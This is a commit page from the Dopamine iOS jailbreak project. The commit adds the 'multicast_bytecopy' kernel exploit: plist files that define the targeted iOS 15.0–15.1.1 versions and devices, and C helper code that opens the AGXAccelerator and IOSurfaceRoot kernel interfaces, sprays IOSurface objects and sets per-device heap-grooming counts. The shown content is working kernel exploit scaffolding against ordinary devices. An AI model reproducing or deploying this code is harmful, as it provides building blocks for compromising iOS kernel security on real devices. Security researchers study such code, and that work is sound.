Add multicast_bytecopy and weightBufs

opa334 · Apr 27, 2024 · 6bce108 · 6bce108
1 parent e58beb6
commit 6bce108
Show file tree

Hide file tree

Showing 64 changed files with 5,844 additions and 32 deletions.
diff --git a/Application/Dopamine.xcodeproj/project.pbxproj b/Application/Dopamine.xcodeproj/project.pbxproj
diff --git a/Application/Dopamine/Exploits/kfd/Info.plist b/Application/Dopamine/Exploits/kfd/Info.plist
@@ -8,63 +8,48 @@
 		<dict>
 			<key>DPFlavorPriority</key>
 			<integer>800</integer>
+			<key>DPSupportExclude</key>
+			<array/>
+			<key>DPSupportInclude</key>
+			<array/>
 			<key>DPSupportedRanges</key>
 			<array>
 				<dict>
-					<key>Start</key>
-					<string>15.0</string>
 					<key>End</key>
 					<string>16.6.1</string>
+					<key>Start</key>
+					<string>15.0</string>
 				</dict>
 			</array>
-			<key>DPSupportExclude</key>
-			<array/>
-			<key>DPSupportInclude</key>
-			<array/>
 		</dict>
 		<key>physpuppet</key>
 		<dict>
 			<key>DPFlavorPriority</key>
-			<integer>1000</integer>
+			<integer>950</integer>
+			<key>DPSupportExclude</key>
+			<array/>
+			<key>DPSupportInclude</key>
+			<array/>
 			<key>DPSupportedRanges</key>
 			<array>
 				<dict>
-					<key>Start</key>
-					<string>15.0</string>
 					<key>End</key>
 					<string>15.7.3</string>
+					<key>Start</key>
+					<string>15.0</string>
 				</dict>
 				<dict>
-					<key>Start</key>
-					<string>16.0</string>
 					<key>End</key>
 					<string>16.3.1</string>
+					<key>Start</key>
+					<string>16.0</string>
 				</dict>
 			</array>
-			<key>DPSupportExclude</key>
-			<array/>
-			<key>DPSupportInclude</key>
-			<array/>
 		</dict>
 		<key>smith</key>
 		<dict>
 			<key>DPFlavorPriority</key>
 			<integer>600</integer>
-			<key>DPSupportedRanges</key>
-			<array>
-				<dict>
-					<key>Start</key>
-					<string>15.0</string>
-					<key>End</key>
-					<string>15.7.6</string>
-				</dict>
-				<dict>
-					<key>Start</key>
-					<string>16.0</string>
-					<key>End</key>
-					<string>16.5</string>
-				</dict>
-			</array>
 			<key>DPSupportExclude</key>
 			<array/>
 			<key>DPSupportInclude</key>
@@ -76,11 +61,24 @@
 					</array>
 				</dict>
 			</array>
+			<key>DPSupportedRanges</key>
+			<array>
+				<dict>
+					<key>End</key>
+					<string>15.7.6</string>
+					<key>Start</key>
+					<string>15.0</string>
+				</dict>
+				<dict>
+					<key>End</key>
+					<string>16.5</string>
+					<key>Start</key>
+					<string>16.0</string>
+				</dict>
+			</array>
 		</dict>
 	</dict>
 	<key>DPExploitType</key>
 	<string>Kernel</string>
-	<key>CFBundleDisplayName</key>
-	<string>kfd</string>
 </dict>
 </plist>
diff --git a/Application/Dopamine/Exploits/multicast_bytecopy/Info.plist b/Application/Dopamine/Exploits/multicast_bytecopy/Info.plist
@@ -0,0 +1,44 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+	<key>DPExploitFlavors</key>
+	<dict>
+		<key>default</key>
+		<dict>
+			<key>DPFlavorPriority</key>
+			<integer>1000</integer>
+			<key>DPSupportExclude</key>
+			<array>
+				<dict>
+					<key>Devices</key>
+					<array>
+						<string>A8</string>
+						<string>A9</string>
+					</array>
+				</dict>
+			</array>
+			<key>DPSupportInclude</key>
+			<array>
+				<dict>
+					<key>Builds</key>
+					<array>
+						<string>19C5026i</string>
+					</array>
+				</dict>
+			</array>
+			<key>DPSupportedRanges</key>
+			<array>
+				<dict>
+					<key>End</key>
+					<string>15.1.1</string>
+					<key>Start</key>
+					<string>15.0</string>
+				</dict>
+			</array>
+		</dict>
+	</dict>
+	<key>DPExploitType</key>
+	<string>Kernel</string>
+</dict>
+</plist>
diff --git a/Application/Dopamine/Exploits/multicast_bytecopy/exploit/IOGPU.c b/Application/Dopamine/Exploits/multicast_bytecopy/exploit/IOGPU.c
@@ -0,0 +1,81 @@
+#include "IOGPU.h"
+
+#include <sys/utsname.h>
+
+io_connect_t IOGPU_init(void)
+{
+    mach_port_t mp = MACH_PORT_NULL;
+    kern_return_t IOMasterPort(mach_port_t, mach_port_t *);
+    IOMasterPort(MACH_PORT_NULL, &mp);
+    io_connect_t uc;
+
+    io_service_t s = IOServiceGetMatchingService(mp, IOServiceMatching("AGXAccelerator"));
+    if (s == MACH_PORT_NULL)
+    {
+        return 0;
+    }
+
+    if (IOServiceOpen(s, mach_task_self(), 1, &uc) != KERN_SUCCESS)
+    {
+        return 0;
+    }
+
+    return uc;
+}
+
+void IOGPU_exit(io_connect_t uc)
+{
+    IOServiceClose(uc);
+}
+
+uint32_t IOGPU_create_command_queue(io_connect_t uc, uint64_t member)
+{
+    uint64_t outStructCnt = 0x10;
+    uint32_t inStructCnt = 0x408;
+    uint8_t inStruct[0x408] = {0};
+    uint8_t outStruct[0x10] = {0};
+
+    // avoid null termination
+    memset(inStruct, 0x01, 0x30);
+    *(uint64_t *)(inStruct + 0x30) = member;
+
+    kern_return_t kr = IOConnectCallStructMethod(uc, 7, inStruct, inStructCnt, outStruct, (size_t *)&outStructCnt);
+
+    if (kr)
+        return 0;
+
+    return 1;
+}
+
+int IOGPU_get_command_queue_extra_refills_needed(void)
+{
+    struct utsname u;
+    uname(&u);
+
+    // iPhone 7
+    // iPhone 11
+    // iPhone 12
+    // iPhone 13
+    if (
+       strstr(u.machine, "iPhone9,")
+    || strstr(u.machine, "iPhone12,")
+    || strstr(u.machine, "iPhone13,")
+    || strstr(u.machine, "iPhone14,")
+    )
+    {
+        return 1;
+    }
+    // iPhone 8, X
+    // iPhone XS, XR
+    else if (
+       strstr(u.machine, "iPhone10,")
+    || strstr(u.machine, "iPhone11,")
+    )
+    {
+        return 3;
+    }
+
+    printf("IOGPU_get_command_queue_extra_refills_needed(): Unknown device %s! May panic in generic part until correct number 1-5 is provided for this device!\n", u.machine);
+
+    return -1;
+}
diff --git a/Application/Dopamine/Exploits/multicast_bytecopy/exploit/IOGPU.h b/Application/Dopamine/Exploits/multicast_bytecopy/exploit/IOGPU.h
@@ -0,0 +1,16 @@
+#ifndef __IOGPU_H__
+#define __IOGPU_H__
+
+#include "iokit.h"
+
+#include <mach/mach.h>
+#include <stdint.h>
+
+io_connect_t IOGPU_init(void);
+void IOGPU_exit(io_connect_t uc);
+
+uint32_t IOGPU_create_command_queue(io_connect_t uc, uint64_t member);
+
+int IOGPU_get_command_queue_extra_refills_needed(void);
+
+#endif
diff --git a/Application/Dopamine/Exploits/multicast_bytecopy/exploit/IOSurfaceRoot.c b/Application/Dopamine/Exploits/multicast_bytecopy/exploit/IOSurfaceRoot.c
@@ -0,0 +1,124 @@
+#include "IOSurfaceRoot.h"
+
+io_connect_t IOSurfaceRoot_init(void)
+{
+    kern_return_t IOMasterPort(mach_port_t, mach_port_t *);
+    mach_port_t mp = MACH_PORT_NULL;
+    IOMasterPort(MACH_PORT_NULL, &mp);
+    io_connect_t uc;
+
+    io_service_t s = IOServiceGetMatchingService(mp, IOServiceMatching("IOSurfaceRoot"));
+    if (s == MACH_PORT_NULL)
+    {
+        return 0;
+    }
+
+    if (IOServiceOpen(s, mach_task_self(), 0, &uc) != KERN_SUCCESS)
+    {
+        return 0;
+    }
+
+    return uc;
+}
+
+void IOSurfaceRoot_exit(io_connect_t uc)
+{
+    IOServiceClose(uc);
+}
+
+uint32_t IOSurfaceRoot_create_surface_fast(io_connect_t uc)
+{
+    // Brandon Azad's definitions from https://bugs.chromium.org/p/project-zero/issues/detail?id=1986#c4
+    struct _IOSurfaceFastCreateArgs {
+        uint64_t address;
+        uint32_t width;
+        uint32_t height;
+        uint32_t pixel_format;
+        uint32_t bytes_per_element;
+        uint32_t bytes_per_row;
+        uint32_t alloc_size;
+    };
+
+    struct IOSurfaceLockResult {
+        uint8_t _pad1[0x18];
+        uint32_t surface_id;
+        uint8_t _pad2[0xF60-0x18-0x4];
+    };
+
+    struct _IOSurfaceFastCreateArgs create_args = { .alloc_size = (uint32_t) 0x4000 };
+    struct IOSurfaceLockResult lock_result = {0};
+    uint64_t lock_result_size = sizeof(lock_result);
+
+    IOConnectCallMethod(
+            uc,
+            6,
+            NULL, 0,
+            &create_args, sizeof(create_args),
+            NULL, NULL,
+            &lock_result, (size_t *)&lock_result_size);
+
+    return lock_result.surface_id;
+}
+
+kern_return_t IOSurfaceRoot_lookup_surface(io_connect_t uc, uint32_t surf_id)
+{
+    uint64_t sz = 0xF60;
+    uint8_t o[0xF60];
+    uint64_t scalarInput = surf_id;
+    kern_return_t ret = IOConnectCallMethod(uc, 4, &scalarInput, 1, 0, 0, 0, 0, o, (size_t *)&sz);
+    return ret;
+}
+
+kern_return_t IOSurfaceRoot_release_surface(io_connect_t uc, uint32_t surf_id)
+{
+    uint64_t scalarInput = surf_id;
+    kern_return_t ret = IOConnectCallMethod(uc, 1, &scalarInput, 1, 0, 0, 0, 0, 0, 0);
+    return ret;
+}
+
+void IOSurfaceRoot_release_all(io_connect_t uc)
+{
+    for (uint32_t surf_id = 1; surf_id < 0x3FFF; ++surf_id)
+    {
+        IOSurfaceRoot_release_surface(uc, surf_id);
+    }
+}
+
+uint32_t IOSurfaceRoot_get_surface_use_count(io_connect_t uc, uint32_t surf_id)
+{
+    uint64_t scalarInput = surf_id;
+    uint64_t output = 0;
+    uint64_t outputCnt = 1;
+    IOConnectCallMethod(uc, 16, &scalarInput, 1, 0, 0, &output, (uint32_t *)&outputCnt, 0, 0);
+
+    return (uint32_t)output;
+}
+
+void IOSurfaceRoot_set_compressed_tile_data_region_memory_used_of_plane(io_connect_t uc, uint32_t surf_id, uint64_t tile)
+{
+    uint64_t scalarInput[3];
+
+    scalarInput[0] = surf_id;
+    scalarInput[1] = 0;
+    scalarInput[2] = tile;
+
+    IOConnectCallScalarMethod(uc, 31, (uint64_t *)&scalarInput, 3, 0, 0);
+}
+
+uint32_t IOSurfaceRoot_cause_array_size_to_be_0x4000(void)
+{
+    for (int i = 0; i < 4; ++i)
+    {
+        io_connect_t uc = IOSurfaceRoot_init();
+        for (int i = 0; i < 0xf00; ++i)
+        {
+            uint32_t last_id = IOSurfaceRoot_create_surface_fast(uc);
+            if (0x3400 <= (last_id * sizeof(uint64_t)))
+            {
+                return last_id;
+            }
+        }
+    }
+
+    return -1;
+}